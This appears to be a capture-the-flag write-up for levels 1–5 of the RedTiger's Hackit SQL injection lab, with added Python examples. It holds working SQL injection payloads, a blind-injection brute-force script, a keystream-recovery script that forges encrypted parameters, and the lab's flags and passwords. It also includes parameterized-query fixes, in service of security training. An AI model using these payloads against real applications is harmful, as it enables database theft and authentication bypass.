writeup--RedTiger's Hackit
Source: Internet   Published by: 阿里云服务器代理商   Editor: 程序博客网   Date: 2024/06/05 07:28
RedTiger’s Hackit
Level 1
First click into Category 1.
The URL now ends in ?cat=1, which is an obvious SQL injection point.
It even gives away the table name: Tablename: level1_users
So build a UNION that matches the four columns of the original query, placing username and password in the columns the page renders:
https://redtiger.labs.overthewire.org/level1.php?cat=1 union select 1,2,username,password from level1_users
This yields the password thatwaseasy.
The flag is 27cbddc803ecde822d87a7e8639f9315.
Level 2
There is a login form, so this should be SQL injection as well.
I tried the universal username/password ' or ''=' and it injected straight away: with that value in both fields the WHERE clause becomes username='' or ''='' AND password='' or ''='', which is true for every row.
The flag is 1222e2d4ad5da677efb188550528bfaa.
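As an added example (not from the original writeup), here is a minimal stand-in for levels 1 and 2 backed by an in-memory SQLite database. It shows how the two payloads above reach the data when the parameter is concatenated into the SQL text, and that the same payloads do nothing once the value is bound as a parameter. Apart from level1_users and the password thatwaseasy, every table, column and user name here is an assumption, and the rows are constructed.

```python
import sqlite3

# Payloads exactly as used above for level 1 (in ?cat=) and level 2 (in both login fields).
LEVEL1_PAYLOAD = "1 union select 1,2,username,password from level1_users"
LEVEL2_PAYLOAD = "' or ''='"


def make_db():
    """Constructed stand-in for the two levels: level1_users is the table named
    on the page; the category table, level2_users and the user names are assumed."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE level1_cats (id INTEGER, name TEXT, descr TEXT, extra TEXT);
        INSERT INTO level1_cats VALUES (1, 'Category 1', 'first category', '');
        CREATE TABLE level1_users (username TEXT, password TEXT);
        INSERT INTO level1_users VALUES ('someuser', 'thatwaseasy');
        CREATE TABLE level2_users (username TEXT, password TEXT);
        INSERT INTO level2_users VALUES ('admin', 'not-on-the-page');
    """)
    return db


def category_vulnerable(db, cat):
    """level1.php?cat=<cat> with the value pasted into the SQL text: a UNION with
    the same column count (4 here) appends rows from any table to the result."""
    sql = "SELECT id, name, descr, extra FROM level1_cats WHERE id=" + cat
    return db.execute(sql).fetchall()


def login_vulnerable(db, user, pw):
    """Level 2 style login: ' or ''=' in both fields turns the WHERE clause into
    username='' or ''='' AND password='' or ''='', which is true for every row."""
    sql = ("SELECT username FROM level2_users WHERE username='" + user
           + "' AND password='" + pw + "'")
    return db.execute(sql).fetchall()


def category_safe(db, cat):
    """Hardened: cast to the expected type and bind the value instead of splicing it."""
    try:
        cat_id = int(cat)
    except ValueError:
        return []
    return db.execute(
        "SELECT id, name, descr, extra FROM level1_cats WHERE id=?", (cat_id,)
    ).fetchall()


def login_safe(db, user, pw):
    """Hardened: bound parameters, so the quotes in the payload are plain data.
    (A real login would also compare a password hash, not the cleartext.)"""
    return db.execute(
        "SELECT username FROM level2_users WHERE username=? AND password=?", (user, pw)
    ).fetchall()


def leaked_credentials(rows):
    """Pick out the (username, password) pairs a UNION smuggled into the last two columns."""
    return [(r[2], r[3]) for r in rows if r[3] not in ("", None)]


if __name__ == "__main__":
    db = make_db()
    print(leaked_credentials(category_vulnerable(db, LEVEL1_PAYLOAD)))
    print(login_vulnerable(db, LEVEL2_PAYLOAD, LEVEL2_PAYLOAD))
    print(category_safe(db, LEVEL1_PAYLOAD), login_safe(db, LEVEL2_PAYLOAD, LEVEL2_PAYLOAD))
```

The UNION only works because the injected SELECT has the same number of columns as the original query; that is why the level 1 payload pads with 1,2 before username,password.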
Level 3
The hint says Get an error. I spent a long time failing to produce one; after reading someone else's writeup, changing the parameter to ?usr[1]=1 gives the error message:
Warning: preg_match() expects parameter 2 to be string, array given in /var/www/html/hackit/urlcrypt.inc on line 25
Looking at urlcrypt.inc shows the code below, so the long strings after cow and admin are encrypted parameter values. Since both the encrypt and decrypt functions are given, I can simply write the SQL injection, encrypt it and send it. Note that the encryption scheme has been changed at some point. If you reuse this code, run it on Linux; on Windows the output may come out garbled, because the keystream is whatever rand() produces after the fixed srand() seed, and before PHP 7.1 that was the platform's C library generator, so it only matches the target when generated on a matching platform and PHP version.
```php
<?php
// warning! ugly code ahead :)
function encrypt($str)
{
    $cryptedstr = "";
    srand(3284724);                      // constant seed: identical keystream for every call
    for ($i = 0; $i < strlen($str); $i++) {
        $temp = ord(substr($str, $i, 1)) ^ rand(0, 255);
        while (strlen($temp) < 3) {      // each byte becomes a zero-padded 3-digit decimal
            $temp = "0" . $temp;
        }
        $cryptedstr .= $temp . "";
    }
    return base64_encode($cryptedstr);
}

function decrypt($str)
{
    srand(3284724);
    if (preg_match('%^[a-zA-Z0-9/+]*={0,2}$%', $str)) {   // line 25: the warning above
        $str = base64_decode($str);
        if ($str != "" && $str != null && $str != false) {
            $decStr = "";
            for ($i = 0; $i < strlen($str); $i += 3) {
                $array[$i / 3] = substr($str, $i, 3);
            }
            foreach ($array as $s) {
                $a = $s ^ rand(0, 255);  // "076" is coerced to the integer 76 before the XOR
                $decStr .= chr($a);
            }
            return $decStr;
        }
        return false;
    }
    return false;
}
?>
```
The plaintext to encrypt is ' union select 1,password,2,3,4,5,6 from level3_users where username='Admin (seven columns to match the original query; the closing quote after Admin is supplied by the application's own SQL).
After encryption this gives:
https://redtiger.labs.overthewire.org/level3.php?usr=MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQxMjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw
Flag: a707b245a60d570d25a0449c2a516eca
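Added example, not part of the original writeup: because urlcrypt.inc reseeds rand() with a constant, every value it encrypts is XORed with the same keystream. The plaintext/ciphertext pair above is therefore enough to recover that keystream for its first 75 bytes and to encrypt any payload up to that length without running PHP at all, which also sidesteps the platform-dependence of rand(). The code assumes the pair quoted above is exact; the probe payload at the bottom is a made-up illustration.

```python
import base64
import re

# The plaintext/ciphertext pair from the level 3 section above.
KNOWN_PLAINTEXT = ("' union select 1,password,2,3,4,5,6 from level3_users "
                   "where username='Admin")
KNOWN_TOKEN = (
    "MDc2MTUxMDIyMTc3MTM5MjMwMTQ1MDI0MjA5MTAwMTc3MTUzMDc0MTg3MDk1MDg0MjQzMDE3MjUyMDI1"
    "MTI2MTU2MTc2MTMzMDAwMjQ2MTU2MjA4MTgyMDk2MTI5MjIwMDQ5MDUyMjMwMTk4MTk2MTg5MTEzMDQx"
    "MjQwMTQ0MDM2MTQwMTY5MTcyMDgzMjQ0MDg3MTQxMTE1MDY2MTUzMjE0MDk1MDM4MTgxMTY1MDQ3MTE4"
    "MDg2MTQwMDM0MDg1MTE4MTE4MDk5MjIyMjE4MDEwMTkwMjIwMDcxMDQwMjIw"
)

# Same acceptance test as decrypt()'s preg_match on line 25 of urlcrypt.inc.
TOKEN_RE = re.compile(r"[a-zA-Z0-9/+]*={0,2}")


def unwrap(token):
    """Undo the framing: base64 -> run of zero-padded 3-digit groups -> list of ints."""
    digits = base64.b64decode(token).decode("ascii")
    if len(digits) % 3 or not digits.isdigit():
        raise ValueError("token is not a run of 3-digit decimal groups")
    return [int(digits[i:i + 3]) for i in range(0, len(digits), 3)]


def wrap(values):
    """Inverse of unwrap(): what encrypt() emits for a list of XORed bytes."""
    digits = "".join("%03d" % v for v in values)
    return base64.b64encode(digits.encode("ascii")).decode("ascii")


def recover_keystream(plaintext, token):
    """c_i = p_i ^ k_i with k fixed by the constant seed, so k_i = c_i ^ p_i."""
    cipher = unwrap(token)
    plain = plaintext.encode("latin-1")
    if len(cipher) != len(plain):
        raise ValueError("plaintext and token lengths differ")
    return bytes(c ^ p for c, p in zip(cipher, plain))


def encrypt_with(keystream, plaintext):
    """Encrypt a new payload with the recovered keystream (no PHP needed)."""
    plain = plaintext.encode("latin-1")
    if len(plain) > len(keystream):
        raise ValueError("payload longer than the %d recovered keystream bytes" % len(keystream))
    token = wrap([p ^ k for p, k in zip(plain, keystream)])
    assert TOKEN_RE.fullmatch(token)     # would pass decrypt()'s regex check
    return token


def decrypt_with(keystream, token):
    return bytes(c ^ k for c, k in zip(unwrap(token), keystream)).decode("latin-1")


if __name__ == "__main__":
    ks = recover_keystream(KNOWN_PLAINTEXT, KNOWN_TOKEN)
    print("recovered %d keystream bytes" % len(ks))
    # Constructed probe payload: any plaintext of at most len(ks) bytes can be sent this way.
    probe = "' union select 1,username,2,3,4,5,6 from level3_users#"
    print(encrypt_with(ks, probe))
```

The recovered keystream is only as long as the known plaintext, so a payload longer than 75 bytes still needs the real rand() sequence; for anything shorter, the known-plaintext route is both simpler and platform-independent.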
Level 4
Clicking "click me" adds ?id=1 to the URL, which is clearly injectable; the page title says it is a blind injection.
First guess the length of keyword: the subquery counts rows whose keyword has the tested length, so the page only returns its row when the guess is right.
http://redtiger.labs.overthewire.org/level4.php?id=1%20and%200%3C(select%20count(*)%20from%20level4_secret%20where%20length(keyword)=21)
The length turns out to be 21, so write a Python script to brute-force it character by character:
```python
from urllib.request import Request, urlopen
from urllib.parse import quote
import string
from re import findall

# One request per (position, candidate): the injected subquery returns 1 when the
# candidate matches, and the page then prints "Query returned 1 rows."
char = string.printable
url = ("http://redtiger.labs.overthewire.org/level4.php?id=1%20and%201="
       "(select%20count(*)%20from%20level4_secret%20where%20SUBSTR(keyword,{0},1)='{1}')")
login = {'Cookie': 'level4login=there_is_no_bug'}
answer = ""
for q in range(1, 22):          # keyword length is 21 (found above)
    for i in char:
        # percent-encode the candidate so characters such as %, #, & or a space
        # cannot break the URL before it reaches the query
        test = url.format(q, quote(i, safe=""))
        request = Request(test, None, headers=login)
        a = urlopen(request)
        s = a.read().decode()
        if findall("Query returned 1 rows.", s):
            print("{0} ".format(q) + i)
            answer += i
            break
print(answer)
```
The keyword is killstickswithbr1cks!
flag: e8bcb79c389f5e295bac81fda9fd7cfa
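Added example, not from the original writeup: the script above needs up to 100 requests per character, one per printable candidate. A boolean blind oracle can instead binary-search each character's code point in 8 requests. It is shown here against a local SQLite simulation of level4.php rather than the live site: the link table and its name level4_links are assumed, and the keyword is planted from the value recovered above. Only page_has_row() would change for the real target, where MySQL's ascii() replaces SQLite's unicode().

```python
import sqlite3


class Target:
    """Local simulation of level4.php: an id parameter spliced into a query over an
    assumed link table, plus the level4_secret table named on the page."""

    def __init__(self, keyword):
        self.db = sqlite3.connect(":memory:")
        self.db.executescript("""
            CREATE TABLE level4_links (id INTEGER, url TEXT);
            INSERT INTO level4_links VALUES (1, 'http://example.invalid/');
            CREATE TABLE level4_secret (keyword TEXT);
        """)
        self.db.execute("INSERT INTO level4_secret VALUES (?)", (keyword,))
        self.queries = 0        # counts simulated HTTP requests

    def page_has_row(self, injected_id):
        """True iff the page would print 'Query returned 1 rows.' for ?id=<injected_id>."""
        self.queries += 1
        rows = self.db.execute(
            "SELECT url FROM level4_links WHERE id=" + injected_id).fetchall()
        return len(rows) == 1


def ask(target, condition):
    """Boolean oracle with the same 'id=1 and 1=(select count(*) ...)' shape as above."""
    return target.page_has_row(
        "1 and 1=(select count(*) from level4_secret where %s)" % condition)


def find_length(target, limit=64):
    """Same length probe as the URL above, tried for 1..limit."""
    for n in range(1, limit + 1):
        if ask(target, "length(keyword)=%d" % n):
            return n
    return None


def extract_keyword(target):
    """Binary-search each character's code point in [0, 255]: 8 requests per
    character instead of one per candidate. unicode() is SQLite's ascii()."""
    n = find_length(target)
    result = []
    for pos in range(1, n + 1):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(target, "unicode(substr(keyword,%d,1))>%d" % (pos, mid)):
                lo = mid + 1
            else:
                hi = mid
        result.append(chr(lo))
    return "".join(result)


if __name__ == "__main__":
    t = Target("killstickswithbr1cks!")     # planted: the value recovered above
    print(extract_keyword(t), "in", t.queries, "requests")
```

Comparing code points rather than characters also avoids the case-insensitive string comparison of MySQL's default collation, which would make a candidate 'a' match a stored 'A' in the equality test the original script uses.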
Level 5
The description says watch the login errors.
Entering admin makes the input box disappear, so the word admin is being filtered.
The filter also ignores case, so bypass it with a hex literal instead: MySQL treats 0x61646d696e as the string admin, but the filter never sees that word.
According to the hint the password is md5-hashed, so build:
' union select 0x61646d696e as username, md5(123) as password #
and log in with 123 as the password, so that its md5 matches the hash in the injected row.
The flag is ca5c3c4f0bc85af1392aef35fc1d09b3.
To be continued